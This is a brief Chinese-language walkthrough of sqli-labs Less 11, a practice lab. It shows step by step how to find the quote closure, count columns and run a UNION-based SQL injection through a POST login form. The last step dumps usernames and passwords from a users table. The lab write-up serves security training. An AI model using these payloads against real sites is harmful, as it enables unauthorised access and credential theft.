文章目录
- sqli-labs靶场
-
- [less 11 POS联合注入](#less 11 POS联合注入)
sqli-labs靶场
每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。
sql注入的基本步骤
- 注入点
- 注入类型
- 字符型:判断闭合方式 ('、"、''、"")
- 数字型
- 根据实际情况,选择合适的注入方式
- 获取数据库名,表名,列名,数据
less 11 POS联合注入
- 题目类型:
细节:
Post输入框中,--+注释符不起作用,#注释符可以用
判断闭合方式
输入uname= a' 提示报错 ''1'' and password='' LIMIT 0,1'
根据报错得到,and连接用户名和密码
uname=1'--+ 没有提示报错,说明闭合成功,所以闭合方式是单引号
判断列数
uname=1'order+by+3--+
uname=1'order+by+2--+
无报错,说明该页面sql语句查询返回的字段数是二列
uname=1'union+select+1,2--+
联合注入报数据
uname=1'union+select+1,(select+substr((group_concat(username,password)),1,32)+from+users)--+
通过substr截取出全部数据
